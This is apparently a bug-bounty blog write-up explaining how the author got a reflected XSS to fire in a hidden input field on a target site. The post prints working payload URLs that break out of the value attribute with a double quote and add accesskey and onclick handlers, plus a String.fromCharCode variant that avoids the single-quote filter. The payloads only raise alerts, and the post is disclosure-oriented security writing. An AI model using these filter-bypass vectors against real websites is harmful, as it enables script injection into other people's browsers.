…where you have the input sanitized for ‘<> chars.

I come across a web application on a bounty program where the returnurl was placed in the following HTML:

[code language=”html”]<input type="hidden" name="returnurl" value="[USER INJECT]" />[/code]

The security filter removed <>’ chars but kept the double quote active and reflected.
What’s the first thing that comes to mind?

[code language=”html”]http://victim/?returnurl=" onclick="prompt(1)[/code]

Oh no! Wait… This is a hidden field so most Javascript events can’t work because you can’t see the input box right?
Also you can’t style it to show the field.

What I did was quite simple. I remember that Gareth Heyes wrote a small article on PortSwigger where you can use accesskey to get the XSS working. You press a key on your keyboard and you call a Javascript event. So my injection become:

[code language=”html”]http://victim/?returnurl=" accesskey="X" onclick="alert(document.domain)[/code]

Which reflected:

[code language=”html”]<input type="hidden" name="returnurl" value="" accesskey="X" onclick="alert(document.domain)" />[/code]

If the victim uses the accesskey X [usually by using ALT+SHIFT+X – Windows or CTRL+ALT+X in OSX] it will get the domain reflected in the javascript alert box. Keep in mind that this works only at Firefox.

To give a better report and also to bypass their single quote I also sent the following XSS vector:

[code language=”html”]http://victim/?returnurl=" accesskey="X" onclick="alert(String.fromCharCode(39,89,111,117,32,103,111,116,32,88,83,83,101,100,33,39))[/code]

It requires more user interaction but might give the bug appreciation program the Woooo! Factor 🙂

3 Replies to “XSS on a input hidden field”

Leave a Reply